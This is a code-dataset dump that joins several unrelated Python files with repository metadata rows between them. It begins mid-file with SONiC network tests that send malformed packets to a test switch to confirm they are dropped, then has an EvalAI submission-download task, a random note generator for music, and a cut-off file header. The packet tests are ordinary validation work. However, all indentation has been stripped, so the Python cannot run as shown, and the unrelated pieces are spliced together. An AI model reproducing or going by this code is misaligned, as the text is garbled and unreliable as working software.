@return: Dictionary with keys:
port_channel_members, vlan_members, rif_members, dut_to_ptf_port_map, neighbor_sniff_ports, vlans, mg_facts
"""
duthost = duthosts[rand_one_dut_hostname]
intf_per_namespace = {}
port_channel_members = {}
vlan_members = {}
configured_vlans = []
rif_members = []
if tbinfo["topo"]["type"] == "ptf":
pytest.skip("Unsupported topology {}".format(tbinfo["topo"]))
#Gather interface facts per asic
for ns in duthost.get_asic_namespace_list():
intf_per_namespace[ns if ns is not DEFAULT_NAMESPACE else ''] = duthost.interface_facts(namespace=ns)['ansible_facts']['ansible_interface_facts']
# Gather ansible facts
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
for port_channel, interfaces in mg_facts['minigraph_portchannels'].items():
for iface in interfaces["members"]:
port_channel_members[iface] = port_channel
for vlan_id in mg_facts["minigraph_vlans"]:
for iface in mg_facts["minigraph_vlans"][vlan_id]["members"]:
vlan_members[iface] = vlan_id
rif_members = {item["attachto"]: item["attachto"] for item in mg_facts["minigraph_interfaces"]}
# Compose list of sniff ports
neighbor_sniff_ports = []
for dut_port, neigh in mg_facts['minigraph_neighbors'].items():
neighbor_sniff_ports.append(mg_facts['minigraph_ptf_indices'][dut_port])
for vlan_name, vlans_data in mg_facts["minigraph_vlans"].items():
configured_vlans.append(int(vlans_data["vlanid"]))
setup_information = {
"port_channel_members": port_channel_members,
"vlan_members": vlan_members,
"rif_members": rif_members,
"dut_to_ptf_port_map": mg_facts["minigraph_ptf_indices"],
"neighbor_sniff_ports": neighbor_sniff_ports,
"vlans": configured_vlans,
"mg_facts": mg_facts,
"intf_per_namespace": intf_per_namespace
}
return setup_information
@pytest.fixture
def rif_port_down(duthosts, rand_one_dut_hostname, setup, fanouthosts, loganalyzer):
"""Shut RIF interface and return neighbor IP address attached to this interface."""
duthost = duthosts[rand_one_dut_hostname]
wait_after_ports_up = 30
if not setup["rif_members"]:
pytest.skip("RIF interface is absent")
rif_member_iface = setup["rif_members"].keys()[0]
vm_name = setup["mg_facts"]["minigraph_neighbors"][rif_member_iface].get("name", None)
pytest_assert(vm_name, 'Neighbor not found for RIF member "{}"'.format(rif_member_iface))
ip_dst = None
for item in setup["mg_facts"]["minigraph_bgp"]:
if item["name"] == vm_name and netaddr.valid_ipv4(item["addr"]):
ip_dst = item["addr"]
break
pytest_assert(ip_dst, 'Unable to find IP address for neighbor "{}"'.format(vm_name))
fanout_neighbor, fanout_intf = fanout_switch_port_lookup(fanouthosts, duthost.hostname, rif_member_iface)
loganalyzer[rand_one_dut_hostname].expect_regex = [LOG_EXPECT_PORT_OPER_DOWN_RE.format(rif_member_iface)]
with loganalyzer[rand_one_dut_hostname] as _:
fanout_neighbor.shutdown(fanout_intf)
time.sleep(1)
yield ip_dst
loganalyzer[rand_one_dut_hostname].expect_regex = [LOG_EXPECT_PORT_OPER_UP_RE.format(rif_member_iface)]
with loganalyzer[rand_one_dut_hostname] as _:
fanout_neighbor.no_shutdown(fanout_intf)
time.sleep(wait_after_ports_up)
@pytest.fixture(params=["port_channel_members", "vlan_members", "rif_members"])
def tx_dut_ports(request, setup):
""" Fixture for getting port members of specific port group """
return setup[request.param] if setup[request.param] else pytest.skip("No {} available".format(request.param))
@pytest.fixture
def ports_info(ptfadapter, duthosts, rand_one_dut_hostname, setup, tx_dut_ports):
"""
Return:
dut_iface - DUT interface name expected to receive packtes from PTF
asic_index - asic which owns the dut_iface, significant on a multi-asic platform.
ptf_tx_port_id - Port ID used by PTF for sending packets from expected PTF interface
dst_mac - DUT interface destination MAC address
src_mac - PTF interface source MAC address
"""
duthost = duthosts[rand_one_dut_hostname]
data = {}
data["dut_iface"] = random.choice(tx_dut_ports.keys())
# Check which asic owns this interface
for ns in duthost.get_asic_namespace_list():
if data["dut_iface"] in setup['intf_per_namespace'][ns if ns is not DEFAULT_NAMESPACE else '']:
break
# Get the asic index
asic_index = duthost.get_asic_id_from_namespace(ns)
data["asic_index"] = asic_index
data["ptf_tx_port_id"] = setup["dut_to_ptf_port_map"][data["dut_iface"]]
ns = ns if ns is not DEFAULT_NAMESPACE else ''
vlan = None
if data["dut_iface"] in setup["vlan_members"]:
vlan = setup["vlan_members"][data["dut_iface"]]
if vlan in setup['intf_per_namespace'][ns]:
data["dst_mac"] = setup['intf_per_namespace'][ns][vlan]['macaddress']
else:
data["dst_mac"] = setup['intf_per_namespace'][ns][data["dut_iface"]]['macaddress']
data["src_mac"] = ptfadapter.dataplane.ports[(0, data["ptf_tx_port_id"])].mac()
return data
def log_pkt_params(dut_iface, mac_dst, mac_src, ip_dst, ip_src):
""" Displays information about packet fields used in test case: mac_dst, mac_src, ip_dst, ip_src """
logger.info("Selected TX interface on DUT - {}".format(dut_iface))
logger.info("Packet DST MAC - {}".format(mac_dst))
logger.info("Packet SRC MAC - {}".format(mac_src))
logger.info("Packet IP DST - {}".format(ip_dst))
logger.info("Packet IP SRC - {}".format(ip_src))
def send_packets(pkt, ptfadapter, ptf_tx_port_id, num_packets=1):
# Clear packets buffer on PTF
ptfadapter.dataplane.flush()
time.sleep(1)
# Send packets
testutils.send(ptfadapter, ptf_tx_port_id, pkt, count=num_packets)
time.sleep(1)
def test_equal_smac_dmac_drop(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, fanouthost, pkt_fields, ports_info):
"""
@summary: Create a packet with equal SMAC and DMAC.
"""
if not fanouthost:
pytest.skip("Test case requires explicit fanout support")
duthost = duthosts[rand_one_dut_hostname]
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["dst_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
src_mac = ports_info["dst_mac"]
if "mellanox" == duthost.facts["asic_type"]:
pytest.SKIP_COUNTERS_FOR_MLNX = True
src_mac = "00:00:00:00:00:11"
# Prepare openflow rule
fanouthost.update_config(template_path=MELLANOX_MAC_UPDATE_SCRIPT, match_mac=src_mac, set_mac=ports_info["dst_mac"], eth_field="eth_src")
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=src_mac, # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
comparable_pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["dst_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
do_test("L2", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], comparable_pkt=comparable_pkt)
def test_multicast_smac_drop(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, fanouthost, pkt_fields, ports_info):
"""
@summary: Create a packet with multicast SMAC.
"""
if not fanouthost:
pytest.skip("Test case requires explicit fanout support")
duthost = duthosts[rand_one_dut_hostname]
multicast_smac = "01:00:5e:00:01:02"
src_mac = multicast_smac
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], multicast_smac, pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
if "mellanox" == duthost.facts["asic_type"]:
pytest.SKIP_COUNTERS_FOR_MLNX = True
src_mac = "00:00:00:00:00:11"
# Prepare openflow rule
fanouthost.update_config(template_path=MELLANOX_MAC_UPDATE_SCRIPT, match_mac=src_mac, set_mac=multicast_smac, eth_field="eth_src")
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=src_mac,
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
comparable_pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=multicast_smac,
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
do_test("L2", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], comparable_pkt=comparable_pkt)
def test_not_expected_vlan_tag_drop(do_test, ptfadapter, setup, pkt_fields, ports_info):
"""
@summary: Create a VLAN tagged packet which VLAN ID does not match ingress port VLAN ID.
"""
start_vlan_id = 2
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
max_vlan_id = 1000
upper_bound = max(setup["vlans"]) if setup["vlans"] else max_vlan_id
for interim in range(start_vlan_id, upper_bound):
if interim not in setup["vlans"]:
vlan_id = interim
break
else:
pytest.fail("Unable to generate unique not yet existed VLAN ID. Already configured VLANs range {}-{}".format(start_vlan_id,
upper_bound))
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"],
dl_vlan_enable=True,
vlan_vid=vlan_id,
)
do_test("L2", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"])
def test_dst_ip_is_loopback_addr(do_test, ptfadapter, setup, pkt_fields, tx_dut_ports, ports_info):
"""
@summary: Create a packet with loopback destination IP adress.
"""
ip_dst = "127.0.0.1"
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], ip_dst, pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=ip_dst, # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_src_ip_is_loopback_addr(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create a packet with loopback source IP adress.
"""
ip_src = "127.0.0.1"
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], ip_src)
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=ip_src, # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_dst_ip_absent(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create a packet with absent destination IP address.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], "", pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst="", # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("ip_addr", ["ipv4", "ipv6"])
def test_src_ip_is_multicast_addr(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ip_addr, ports_info):
"""
@summary: Create a packet with multicast source IP adress.
"""
ip_src = None
if ip_addr == "ipv4":
ip_src = "224.0.0.5"
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=ip_src,
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
elif ip_addr == "ipv6":
if not pkt_fields["ipv6_dst"]:
pytest.skip("BGP neighbour with IPv6 addr was not found")
ip_src = "FF02:AAAA:FEE5::1:3"
pkt = testutils.simple_tcpv6_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ipv6_src=ip_src,
ipv6_dst=pkt_fields["ipv6_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
else:
pytest.fail("Incorrect value specified for 'ip_addr' test parameter. Supported parameters: 'ipv4' and 'ipv6'")
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], ip_src)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_src_ip_is_class_e(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create a packet with source IP address in class E.
"""
duthost = duthosts[rand_one_dut_hostname]
asic_type = duthost.facts["asic_type"]
pytest_require("broadcom" not in asic_type, "BRCM does not drop SIP class E packets")
ip_list = ["240.0.0.1", "255.255.255.254"]
for ip_class_e in ip_list:
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"],
ip_class_e)
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=ip_class_e,
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("addr_type, addr_direction", [("ipv4", "src"), ("ipv6", "src"), ("ipv4", "dst"),
("ipv6", "dst")])
def test_ip_is_zero_addr(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, addr_type, addr_direction, ports_info):
"""
@summary: Create a packet with "0.0.0.0" source or destination IP address.
"""
zero_ipv4 = "0.0.0.0"
zero_ipv6 = "::0"
pkt_params = {
"eth_dst": ports_info["dst_mac"], # DUT port
"eth_src": ports_info["src_mac"], # PTF port
"tcp_sport": pkt_fields["tcp_sport"],
"tcp_dport": pkt_fields["tcp_dport"]
}
if addr_type == "ipv4":
if addr_direction == "src":
pkt_params["ip_src"] = zero_ipv4
pkt_params["ip_dst"] = pkt_fields["ipv4_dst"] # VM source
elif addr_direction == "dst":
pkt_params["ip_src"] = pkt_fields["ipv4_src"] # VM source
pkt_params["ip_dst"] = zero_ipv4
else:
pytest.fail("Incorrect value specified for 'addr_direction'. Supported parameters: 'src' and 'dst'")
pkt = testutils.simple_tcp_packet(**pkt_params)
elif addr_type == "ipv6":
if not pkt_fields["ipv6_dst"]:
pytest.skip("BGP neighbour with IPv6 addr was not found")
if addr_direction == "src":
pkt_params["ipv6_src"] = zero_ipv6
pkt_params["ipv6_dst"] = pkt_fields["ipv6_dst"] # VM source
elif addr_direction == "dst":
pkt_params["ipv6_src"] = pkt_fields["ipv6_src"] # VM source
pkt_params["ipv6_dst"] = zero_ipv6
else:
pytest.fail("Incorrect value specified for 'addr_direction'. Supported parameters: 'src' and 'dst'")
pkt = testutils.simple_tcpv6_packet(**pkt_params)
else:
pytest.fail("Incorrect value specified for 'addr_type' test parameter. Supported parameters: 'ipv4' or 'ipv6'")
logger.info(pkt_params)
do_test("L3", pkt, ptfadapter, ports_info, setup["dut_to_ptf_port_map"].values(), tx_dut_ports)
def test_dst_ip_link_local(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create a packet with link-local address "169.254.0.0/16".
"""
duthost = duthosts[rand_one_dut_hostname]
asic_type = duthost.facts["asic_type"]
pytest_require("broadcom" not in asic_type, "BRCM does not drop DIP link local packets")
link_local_ip = "169.254.10.125"
pkt_params = {
"eth_dst": ports_info["dst_mac"], # DUT port
"eth_src": ports_info["src_mac"], # PTF port
"tcp_sport": pkt_fields["tcp_sport"],
"tcp_dport": pkt_fields["tcp_dport"]
}
pkt_params["ip_src"] = pkt_fields["ipv4_src"] # VM source
pkt_params["ip_dst"] = link_local_ip
pkt = testutils.simple_tcp_packet(**pkt_params)
logger.info(pkt_params)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
# Test case is skipped, because SONiC does not have a control to adjust loop-back filter settings.
# Default SONiC behaviour is to forward the traffic, so loop-back filter does not triggers for IP packets.
# All router interfaces has attribute "sx_interface_attributes_t.loopback_enable" - enabled.
# To enable loop-back filter drops - need to disable that attribute when create RIF.
# To do this can be used SAI attribute SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION, which is not exposed to SONiC
@pytest.mark.skip(reason="SONiC can't enable loop-back filter feature")
def test_loopback_filter(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create a packet drops by loopback-filter. Loop-back filter means that route to the host
with DST IP of received packet exists on received interface
"""
ip_dst = None
vm_name = setup["mg_facts"]["minigraph_neighbors"][ports_info["dut_iface"]]["name"]
for item in setup["mg_facts"]["minigraph_bgp"]:
if item["name"] == vm_name:
ip_dst = item["addr"]
break
if ip_dst is None:
pytest.skip("Testcase is not supported on current interface")
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], ip_dst, pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=ip_dst,
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"])
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_ip_pkt_with_expired_ttl(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create an IP packet with TTL=0.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"],
pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM IP address
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"],
ip_ttl=0)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("pkt_field, value", [("version", 1), ("chksum", 10), ("ihl", 1)])
def test_broken_ip_header(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, pkt_field, value, ports_info):
"""
@summary: Create a packet with broken IP header.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"],
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
setattr(pkt[testutils.scapy.scapy.all.IP], pkt_field, value)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
def test_absent_ip_header(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, ports_info):
"""
@summary: Create packets with absent IP header.
"""
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"],
pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"],
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
tcp = pkt[testutils.scapy.scapy.all.TCP]
del pkt[testutils.scapy.scapy.all.IP]
pkt.type = 0x800
pkt = pkt/tcp
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("eth_dst", ["01:00:5e:00:01:02", "ff:ff:ff:ff:ff:ff"])
def test_unicast_ip_incorrect_eth_dst(do_test, ptfadapter, setup, tx_dut_ports, pkt_fields, eth_dst, ports_info):
"""
@summary: Create packets with multicast/broadcast ethernet dst.
"""
if "vlan" in tx_dut_ports[ports_info["dut_iface"]].lower():
pytest.skip("Test case is not supported on VLAN interface")
log_pkt_params(ports_info["dut_iface"], eth_dst, ports_info["src_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
pkt = testutils.simple_tcp_packet(
eth_dst=eth_dst, # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"],
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
do_test("L3", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], tx_dut_ports)
@pytest.mark.parametrize("igmp_version,msg_type", [("v1", "general_query"), ("v3", "general_query"), ("v1", "membership_report"),
("v2", "membership_report"), ("v3", "membership_report"), ("v2", "leave_group")])
def test_non_routable_igmp_pkts(do_test, ptfadapter, setup, fanouthost, tx_dut_ports, pkt_fields, igmp_version, msg_type, ports_info):
"""
@summary: Create an IGMP non-routable packets.
"""
# IGMP Types:
# 0x11 = Membership Query
# 0x12 = Version 1 Membership Report
# 0x16 = Version 2 Membership Report
# 0x17 = Leave Group
# IP destination address according to the RFC 2236:
# Message Type Destination Group
# ------------ -----------------
# General Query ALL-SYSTEMS (224.0.0.1)
# Group-Specific Query The group being queried
# Membership Report The group being reported
# Leave Message ALL-ROUTERS (224.0.0.2)
# TODO: fix this workaround as of now current PTF and Scapy versions do not support creation of IGMP packets
# Temporaly created hex of IGMP packet layer by using scapy version 2.4.3.
# Example how to get HEX of specific IGMP packets:
# v3_membership_query = IGMPv3(type=0x11, mrcode=0, chksum=None)/scapy.contrib.igmpv3.IGMPv3mq(gaddr="224.0.0.1",
# srcaddrs=["172.16.11.1", "10.0.0.59"], qrv=1, qqic=125, numsrc=2)
# gr_obj = scapy.contrib.igmpv3.IGMPv3gr(rtype=1, auxdlen=0, maddr="224.2.2.4", numsrc=2, srcaddrs=["172.16.11.1",
# "10.0.0.59"]).build()
# v3_membership_report = IGMPv3(type=0x22, mrcode=0, chksum=None)/scapy.contrib.igmpv3.IGMPv3mr(res2=0x00, numgrp=1,
# records=[gr_obj]).build()
# The rest packets are build like "simple_igmp_packet" function from PTF testutils.py
# FIXME: Need some sort of configuration for EOS and SONiC fanout hosts to
# not drop IGMP packets before they reach the DUT
if not fanouthost:
pytest.skip("Test case requires explicit fanout support")
from scapy.contrib.igmp import IGMP
Ether = testutils.scapy.Ether
IP = testutils.scapy.IP
if "vlan" in tx_dut_ports[ports_info["dut_iface"]].lower() and msg_type == "membership_report":
pytest.skip("Test case is not supported on VLAN interface")
igmp_proto = 0x02
multicast_group_addr = "224.1.1.1"
ethernet_dst = "01:00:5e:01:01:01"
ip_dst = {"general_query": "224.0.0.1",
"membership_report": multicast_group_addr}
igmp_types = {"v1": {"general_query": IGMP(type=0x11, gaddr="224.0.0.1"),
"membership_report": IGMP(type=0x12, gaddr=multicast_group_addr)},
"v2": {"membership_report": IGMP(type=0x16, gaddr=multicast_group_addr),
"leave_group": IGMP(type=0x17, gaddr=multicast_group_addr)},
"v3": {"general_query": "\x11\x00L2\xe0\x00\x00\x01\x01}\x00\x02\xac\x10\x0b\x01\n\x00\x00;",
"membership_report": "\"\x009\xa9\x00\x00\x00\x01\x01\x00\x00\x02\xe0\x02\x02\x04\xac\x10\x0b\x01\n\x00\x00;"}
}
if igmp_version == "v3":
pkt = testutils.simple_ip_packet(
eth_dst=ethernet_dst,
eth_src=ports_info["src_mac"],
ip_src=pkt_fields["ipv4_src"],
ip_dst=ip_dst[msg_type],
ip_ttl=1,
ip_proto=igmp_proto
)
del pkt["Raw"]
pkt = pkt / igmp_types[igmp_version][msg_type]
else:
eth_layer = Ether(src=ports_info["src_mac"], dst=ethernet_dst)
ip_layer = IP(src=pkt_fields["ipv4_src"], )
igmp_layer = igmp_types[igmp_version][msg_type]
assert igmp_layer.igmpize(ip=ip_layer, ether=eth_layer), "Can't create IGMP packet"
pkt = eth_layer/ip_layer/igmp_layer
log_pkt_params(ports_info["dut_iface"], ethernet_dst, ports_info["src_mac"], pkt.getlayer("IP").dst, pkt_fields["ipv4_src"])
do_test("L3", pkt, ptfadapter, ports_info, setup["dut_to_ptf_port_map"].values(), tx_dut_ports)
| 42.143432
| 153
| 0.675562
|
f57fd4d23f427b0686cd4356a8f760d438e20f33
| 2,824
|
py
|
Python
|
apps/jobs/tasks.py
|
apoorvkhare07/EvalAI
|
7961addc9e6717ce962ea74e275b6d1070f6a601
|
[
"BSD-3-Clause"
] | 1
|
2019-11-08T05:23:11.000Z
|
2019-11-08T05:23:11.000Z
|
apps/jobs/tasks.py
|
apoorvkhare07/EvalAI
|
7961addc9e6717ce962ea74e275b6d1070f6a601
|
[
"BSD-3-Clause"
] | 1
|
2021-05-05T00:33:23.000Z
|
2021-05-05T00:33:23.000Z
|
apps/jobs/tasks.py
|
apoorvkhare07/EvalAI
|
7961addc9e6717ce962ea74e275b6d1070f6a601
|
[
"BSD-3-Clause"
] | 1
|
2020-10-03T04:37:58.000Z
|
2020-10-03T04:37:58.000Z
|
import logging
import os
import shutil
from challenges.models import ChallengePhase
from django.contrib.auth.models import User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.http import HttpRequest
from evalai.celery import app
from participants.models import ParticipantTeam
from participants.utils import (
get_participant_team_id_of_user_for_a_challenge
)
from .models import Submission
from .serializers import SubmissionSerializer
from .utils import get_file_from_url
from .sender import publish_submission_message
logger = logging.getLogger(__name__)
@app.task
def download_file_and_publish_submission_message(
request_data,
user_pk,
request_method,
challenge_phase_id
):
"""
Download submission file from url and send it for the evaluation
"""
user = User.objects.get(pk=user_pk)
challenge_phase = ChallengePhase.objects.get(
pk=challenge_phase_id
)
participant_team_id = get_participant_team_id_of_user_for_a_challenge(
user, challenge_phase.challenge.pk
)
participant_team = ParticipantTeam.objects.get(
pk=participant_team_id
)
request = HttpRequest()
request.method = request_method
request.user = user
try:
downloaded_file = get_file_from_url(request_data["file_url"])
file_path = os.path.join(downloaded_file["temp_dir_path"], downloaded_file["name"])
with open(file_path, 'rb') as f:
input_file = SimpleUploadedFile(
downloaded_file["name"],
f.read(),
content_type="multipart/form-data"
)
data = {
"input_file": input_file,
"method_name": request_data["method_name"],
"method_description": request_data["method_description"],
"project_url": request_data["project_url"],
"publication_url": request_data["publication_url"],
"status": Submission.SUBMITTED
}
serializer = SubmissionSerializer(
data=data,
context={
'participant_team': participant_team,
'challenge_phase': challenge_phase,
'request': request
}
)
if serializer.is_valid():
serializer.save()
submission = serializer.instance
# publish messages in the submission worker queue
publish_submission_message(challenge_phase.challenge.pk, challenge_phase.pk, submission.pk)
logger.info("Message published to submission worker successfully!")
shutil.rmtree(downloaded_file['temp_dir_path'])
except Exception as e:
logger.exception(
"Exception while downloading and sending submission for evaluation {}"
.format(e)
)
| 33.619048
| 103
| 0.673513
|
20900e0c2f5ec60ccb5701eaaa4e78fecbd6d50d
| 1,314
|
py
|
Python
|
CrittersProto/generator/uplift.py
|
nickjbenson/Kami
|
2c9614f66055bea02f660f41c3aa5a00083331b8
|
[
"MIT"
] | 1
|
2018-02-26T13:51:23.000Z
|
2018-02-26T13:51:23.000Z
|
CrittersProto/generator/uplift.py
|
nickjbenson/Kami
|
2c9614f66055bea02f660f41c3aa5a00083331b8
|
[
"MIT"
] | null | null | null |
CrittersProto/generator/uplift.py
|
nickjbenson/Kami
|
2c9614f66055bea02f660f41c3aa5a00083331b8
|
[
"MIT"
] | null | null | null |
##################################################################
#
# benchan
#
# MIT License (http://opensource.org/licenses/MIT)
#
##################################################################
from baseGenerator import BaseGenerator
import random
NOTES_PER_BEAT = 1
kPitches = (60, 64, 67, 72,76,79,84, 88, 65, 60, 65)
class Uplift(BaseGenerator):
def __init__(self, seed):
BaseGenerator.__init__(self, seed, synthName="../JR_vibra.sf2")
# Notes
self.notes = choose_notes()
self.note_velocity = 60
self.set_cpb(0, 0, 0)
self.set_num_notes_per_beat(NOTES_PER_BEAT)
def get_notes_list(self):
return self.notes
def get_note_velocity(self):
return self.note_velocity
def choose_notes():
notesList = []
probSustain = 0.9
probNoteOn = 0.2
noteOn = False
# 16 beats
for note in xrange(0, 16):
if not noteOn and random.random() < probNoteOn:
randIndex = random.randint(0, len(kPitches) - 2)
notesList.append([kPitches[randIndex], kPitches[randIndex + 1]])
probSustain = 0.7
elif noteOn and random.random() < probSustain:
notesList.append(0)
probSustain /= 2
else:
notesList.append(-1)
return notesList
| 24.792453
| 76
| 0.555556
|
831cc43188b2ee63669214ececf71ad7cd45f674
| 2,791
|
py
|
Python
|
api_v1/models.py
|
Fastex007/api_yamdb
|
93fd2054111b86d392f5d5769dbe125c16b06126
|
[
"BSD-3-Clause"
] | null | null | null |
api_v1/models.py
|
Fastex007/api_yamdb
|
93fd2054111b86d392f5d5769dbe125c16b06126
|
[
"BSD-3-Clause"
] | null | null | null |
api_v1/models.py
|
Fastex007/api_yamdb
|
